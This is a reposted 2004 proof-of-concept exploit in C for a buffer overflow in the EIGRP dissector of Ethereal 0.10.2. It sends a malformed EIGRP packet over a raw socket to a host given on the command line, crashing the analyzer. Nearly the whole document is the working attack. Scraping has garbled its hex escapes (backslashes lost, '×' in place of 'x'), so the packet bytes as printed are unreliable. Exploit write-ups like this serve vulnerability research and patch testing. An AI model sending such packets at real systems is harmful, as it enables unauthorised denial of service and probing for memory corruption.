GO IT WORLD | IT TECH | IT NEWS

/*
* Ethereal network protocol analyzer
* EIGRP Dissector TLV_IP_INT Long IP Address Overflow
* vulnerability
* proof of concept code
* version 1.0 (Mar 26 2004)
*
* by R�mi Denis-Courmont < ethereal at simphalampin dot com >
*   www simphalempin com dev
*
* This vulnerability was found by:
*   Stefan Esser s.esser e-matters de
* whose original advisory may be fetched from:
*   security e-matters de advisories 032004.html
*
* Vulnerable:
*  – Ethereal v0.10.2
*
* Not vulnerable:
*  – Ethreal v0.10.3
*
* Note: this code will simply trigger a denial of service on Ethereal.
* It should really be possible to exploit the buffer overflow
* (apparently up to 29 bytes overflow), but I haven’t tried.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netdb.h>
static const char packet[] =
        "x01" /* Version */
        "x04" /* Opcode: Reply */
        "x00×00" /* Checksum (invalid) */
        "x00×00x00×00" /* Flags */
        "x00×00x00×00" /* Sequence number */
        "x00×00x00×00" /* ACK */
        "x00×00x00×00" /* AS number */
        /* IP internal routes TLV */
        "x01×02" /* Type */
        "x00×39" /* Length (should be 0×1C) */
        "x00×00x00×00" /* Next hop */
        "x00×00x00×00" /* Delay */
        "x00×00x00×00" /* Bandwitdh */
        "x00×00x00" /* MTU */
        "x00" /* Hop count: directly connected */
        "xff" /* Reliability: maximum */
        "x01" /* Load: minimum */
        "x00×00" /* Reserved */
        "xff" /* Prefix length: should be > 0 and <= 32 */
        "x00×00x00" /* Destination network */
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xffxffxffxff"
        "xffxffxffxff" "xff" /* buffer overflow */
;
static int
proof (const struct sockaddr_in *dest)
{
        int fd;
        size_t len;
        fd = socket (PF_INET, SOCK_RAW, 88);
        if (fd == -1)
        {
                perror ("Raw socket error");
                return 1;
        }
        len = sizeof (packet) – 1;
        if (sendto (fd, packet, len, 0, (const struct sockaddr *)dest,
                        sizeof (struct sockaddr_in)) != len)
        {
                perror ("Packet sending error");
                close (fd);
                return 1;
        }
        puts ("Packet sent!");
        close (fd);
        return 0;
}
static int
usage (const char *path)
{
        fprintf (stderr, "Usage: %s <hostname/IP>n", path);
        return 2;
}
int
main (int argc, char *argv[])
{
        struct sockaddr *dest;
        puts ("Ethereal EIGRP Dissector TLV_IP_INT Long IP Address Overflown"
                "proof of concept coden"
                "Copyright (C) 2004 R<E9>mi Denis-Courmont "
                "<x65×74x68×65x72×65x61×6cx40×73x69×6dx70"
                "x68×61x6cx65×6dx70×69x6ex2ex63×6fx6d>n");
        if (argc != 2)
                return usage (argv[0]);
        else
        {
                struct addrinfo help, *res;
                int check;
                memset (&help, 0, sizeof (help));
                help.ai_family = PF_INET;
                check = getaddrinfo (argv[1], NULL, &help, &res);
                if (check)
                {
                        fprintf (stderr, "%s: %sn", argv[1],
                                        gai_strerror (check));
                        return 1;
                }
                dest = res->ai_addr;
        }
        return proof ((const struct sockaddr_in *)dest);
}